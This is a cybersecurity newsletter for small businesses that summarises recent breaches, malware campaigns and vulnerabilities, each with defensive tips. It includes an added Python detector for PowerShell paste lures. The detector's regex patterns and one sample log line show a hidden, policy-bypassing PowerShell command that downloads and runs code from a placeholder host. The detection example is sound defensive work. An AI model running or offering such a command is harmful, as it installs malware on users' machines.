Threat Matrix: Outage Cripples US Car Dealerships, Sneaky Pop-Ups Trick Users into Installing Malware

Welcome to the July edition of Upfort’s Threat Matrix, your essential guide to cybersecurity news tailored for small business owners. In this edition, we detail some major attacks hitting large corporations as well as sneaky multi-channel attacks, PLUS, as always, we tell you how to protect your business.

Want to help keep your business safe? Take two minutes to fill out our interactive cybersecurity checklist or take a free cybersecurity risk assessment, which taps Upfort’s state-of-the-art AI to surface exploitable vulnerabilities in your digital network.

Neiman Marcus Breach: Hackers Exploit Snowflake Vulnerability

Luxury retailer Neiman Marcus has confirmed a data breach affecting 64,472 customers after hackers accessed its Snowflake account. The compromised data includes names, contact information, dates of birth, and gift card numbers. The breach, linked to a threat actor using stolen credentials, has resulted in personal information being offered for sale on a hacking forum. Neiman Marcus has since disabled access to the breached platform and is working with cybersecurity experts and law enforcement.

How to defend yourself: Implement multi-factor authentication, regularly update passwords, and restrict access to critical systems to trusted networks only. Conduct regular security audits to identify and mitigate vulnerabilities.

Hackers Exploit Facebook PrestaShop Module, Steal Credit Card Info

Cybercriminals are exploiting a vulnerability in the Facebook PrestaShop module to steal customers' credit card details. This module, designed to help e-commerce sites integrate with Facebook, was found to be vulnerable, allowing hackers to inject malicious scripts and capture payment information during checkout. PrestaShop users are urged to update their websites to the latest module version and ensure they are secure.

How to defend yourself: Regularly update all plugins and modules, implement a strong web application firewall, and monitor your sites for unusual activity to prevent exploits like this one.

“Rafel RAT” Opens Outdated Android Phones to Ransomware

The Rafel RAT malware is targeting outdated Android phones, deploying ransomware to lock devices and demand payment. Used by a range of cybercriminals, including known threat actors, the malware exploits vulnerabilities in older Android versions. It spreads through fake apps mimicking trusted brands like Instagram and WhatsApp, granting itself risky permissions. The ransomware module encrypts files and locks the screen, often demanding ransom via Telegram. Most victims are in the US, China, and Indonesia, with attacks affecting a variety of device brands.

How to defend yourself: Ensure all company Android devices are updated to the latest software versions. Avoid downloading apps from untrusted sources, regularly run security scans, and educate employees about recognizing phishing attempts and fake apps.

CDK Global Outage Paralyzes US Car Dealerships

A significant computer system outage hit car dealerships across the United States due to issues with CDK Global, a major provider of software solutions for automotive retailers. The outage disrupted dealership operations, impacting services like sales, inventory management, and customer support. Dealerships were unable to access essential systems, causing delays in transactions and services. Cybercriminals may since have taken further advantage of this hack (see next story).

How to defend yourself: Small businesses can protect themselves from disruptions like the CDK Global outage by diversifying their software providers where possible, maintaining local backups of critical data, and establishing contingency plans for operating manually if digital systems fail. Regularly updating and testing these plans ensures readiness in case of unforeseen technological failures.

Cybercriminals Impersonate CDK Support in Phishing Scheme

In a follow-up to the bad news for CDK, the company issued a warning about cybercriminals posing as CDK support representatives to steal sensitive information. These attackers contact customers via phone calls, emails, and text messages, claiming to be from the company's support team. They attempt to gather login credentials and personal details by exploiting the trust customers place in CDK Global. The company advises customers to verify any suspicious communications and to be cautious when sharing sensitive information.

How to defend yourself: Verify the identity of any support representative before sharing information, use two-factor authentication for added security, and educate employees on recognizing phishing attempts.

Advance Auto Parts Data Breach Exposes Employee Information

Advance Auto Parts has confirmed a data breach that exposed sensitive information of its employees. The breach involved unauthorized access to certain computer systems, resulting in the compromise of personal data including Social Security numbers, driver's license numbers, and financial account details. The company is investigating the incident, enhancing security measures, and offering affected employees free credit monitoring and identity protection services.

How to defend yourself: Regularly update and strengthen your cybersecurity protocols, implement multi-factor authentication, and conduct ongoing employee training on data security best practices.

Malware Spread via Cut-and-Paste Tactics

Cyber adversaries employ counterfeit browser updates and software patches to deceive users into executing PowerShell scripts embedded with diverse malware types, such as remote access Trojans (RATs) and infostealers, thereby infecting their computers. By embedding malicious code into documents and scripts, they bypass traditional security measures. This method targets vulnerabilities in software like Microsoft Office and exploits common user behaviors, making it difficult to detect.

The campaigns show users a pop-up text box suggesting that an error occurred while opening the document or webpage, along with instructions to copy and paste a malicious script into either the PowerShell terminal or the Windows Run dialog box, which ultimately executes the script via PowerShell, according to the researchers tracking these campaigns.

How to defend yourself: Keep all software updated, educate employees on the risks of opening unsolicited documents, and use advanced threat detection tools to scan for embedded malware in documents and scripts.
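One way a small business could hunt for this lure in its own Windows process-creation logs, as an added example that is not part of the newsletter: a command pasted into the Run dialog is launched by explorer.exe, so PowerShell with that parent plus hidden-window, policy-bypass or download-and-run arguments stands out. The sample events are constructed (field names follow Windows Security event 4688; the URL is a placeholder).

```python
# Added example (not from the newsletter or Upfort): flag process-creation records that
# match the cut-and-paste lure, i.e. PowerShell started from the Windows Run dialog
# (parent explorer.exe) with arguments that hide the window, bypass execution policy,
# download-and-run content, or pass an encoded command.
import re

SUSPICIOUS_ARGS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "download/execute": re.compile(
        r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
    "encoded command": re.compile(r"-e(?:nc|ncodedcommand)\b", re.I),
}
POWERSHELL = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
RUN_DIALOG_PARENT = re.compile(r"\\explorer\.exe$", re.I)

# Constructed sample events; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    {"Creator Process Name": r"C:\Windows\explorer.exe",
     "New Process Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Process Command Line": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/fix)"'},
    {"Creator Process Name": r"C:\Windows\explorer.exe",
     "New Process Name": r"C:\Windows\System32\notepad.exe",
     "Process Command Line": "notepad.exe report.txt"},
    {"Creator Process Name": r"C:\Program Files\Vendor\deploy.exe",
     "New Process Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Process Command Line": r"powershell -File C:\scripts\inventory.ps1"},
    {"Creator Process Name": r"C:\Windows\explorer.exe",
     "New Process Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Process Command Line": "powershell -Command Get-Date"},
]

def classify(event):
    """Return the matched indicator names for one 4688-style event (empty list = benign)."""
    if not POWERSHELL.search(event["New Process Name"]):
        return []
    if not RUN_DIALOG_PARENT.search(event["Creator Process Name"]):
        return []
    cmd = event["Process Command Line"]
    return [name for name, rx in SUSPICIOUS_ARGS.items() if rx.search(cmd)]

def find_paste_lure_candidates(events):
    """Indices of events that look like a malicious script pasted into the Run dialog."""
    return [i for i, ev in enumerate(events) if classify(ev)]

if __name__ == "__main__":
    for i in find_paste_lure_candidates(SAMPLE_EVENTS):
        print(i, classify(SAMPLE_EVENTS[i]), SAMPLE_EVENTS[i]["Process Command Line"])
```

Only the first record is flagged; an admin running a plain PowerShell command from the Run dialog (last record) or a scheduled script with a non-explorer parent is left alone, so the check can be tuned before wiring it into an alerting tool.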

VMware Bugs Expose VMs to Remote Code Execution & Data Theft

Critical vulnerabilities in VMware's ESXi, Workstation, and Fusion products have been discovered, potentially allowing attackers to execute remote code and steal data from virtual machines. The flaws, tracked as CVE-2024-2859 and CVE-2024-2860, affect a broad range of VMware environments, posing significant security risks.

How to defend yourself: Apply the latest patches provided by VMware immediately, segment your network to isolate vulnerable systems, and monitor for any unusual activity to detect potential exploitation attempts.
